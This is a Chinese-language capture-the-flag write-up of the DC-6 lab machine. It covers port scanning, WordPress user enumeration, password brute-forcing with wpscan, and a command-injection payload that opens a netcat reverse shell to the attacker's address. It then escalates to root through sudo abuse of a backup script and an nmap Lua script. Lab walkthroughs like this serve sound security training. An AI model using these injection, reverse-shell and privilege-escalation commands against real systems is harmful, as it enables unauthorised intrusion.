DC-6

DC-6

Posted by Kyon-H on July 15, 2025

ip扫描发现主机 192.168.163.133

image.png

namp -T4 -A -p- 192.168.163.133 扫描端口发现80和22端口

image.png

访问网站被重定向 http://wordy/ , 修改hosts文件

发现站点为 wordpress,使用whatweb 查看详细信息,dirsearch扫描目录

1
2
whatweb -v http://wordy/
dirsearch -u http://wordy/

登陆页面: http://wordy/wp-login.php

wpscan 获取用户名

1
2
3
wpscan --url http://wordy/ -e u
# 保存用户名
echo "admin\ngraham\nmark\nsarah\njens" >user.txt

根据官网提示生成密码字典

image.png

1
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

wpscan进行爆破

1
2
wpscan --url http://wordy -U user.txt -P passwords.txt
# mark helpdesk01

image.png

登录成功找到页面,发现存在远程命令执行漏洞

image.png

反弹shell

1
2
3
127.0.0.1;nc -nv 192.168.163.132 4444 -e /bin/bash
# kali
nc -lvvp 4444

查看home目录

1
ls -R /home

image.png

查看 things-to-do.txt 文件,获取用户名密码 graham GSo7isUM1D4

image.png

切换用户后,sudo -l 尝试提权

image.png

image.png

在backups.sh脚本中写入 /bin/bash进行提权

1
2
echo '/bin/bash' >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

切换用户成功,进一步提权

image.png

namp提权

1
2
3
tf=$(mktemp)
echo 'os.execute("/bin/sh")' > $tf
sudo nmap --script=$tf

提权成功

1
2
3
python -c 'import pty;pty.spawn("/bin/bash")'
cd /root
cat theflag.txt

image.png